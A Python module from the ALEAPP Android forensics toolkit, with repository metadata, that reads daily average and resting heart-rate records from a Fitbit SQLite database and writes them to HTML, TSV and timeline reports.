907769470c06a9adb96a73b04f9ea62d43e0d19c | 0ee4debe412b996de7f5a592800515ae7104c5a5 | /scripts/artifacts/fitbitHeart.py | 6710cc413d11222ce7d902507ea13b4b8ec52313 | [
"MIT"
] | permissive | kibaffo33/ALEAPP | af7eebd9d4ab078c57c4108ebab0c80c89df8630 | ca50b7d665dccb846ff601b7b797d754eb8100d9 | refs/heads/master | 2022-06-15T03:55:37.407875 | 2022-06-13T20:39:47 | 2022-06-13T20:39:47 | 243,058,738 | 1 | 0 | null | 2020-02-25T17:29:43 | 2020-02-25T17:29:36 | null | UTF-8 | Python | false | false | 1,477 | py | import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_fitbitHeart(files_found, report_folder, seeker, wrap_text):
file_found = str(files_found[0])
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime("DATE_TIME"/1000, 'unixepoch'),
AVERAGE_HEART_RATE,
RESTING_HEART_RATE
FROM HEART_RATE_DAILY_SUMMARY
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Fitbit Heart Rate Summary')
report.start_artifact_report(report_folder, 'Fitbit Heart Rate Summary')
report.add_script()
data_headers = ('Timestamp','Avg. Heart Rate','Resting Heart Rate')
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'Fitbit Heart Rate Summary'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = f'Fitbit Heart Rate Summary'
timeline(report_folder, tlactivity, data_list, data_headers)
else:
logfunc('No Fitbit Heart Rate Summary data available')
db.close()
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.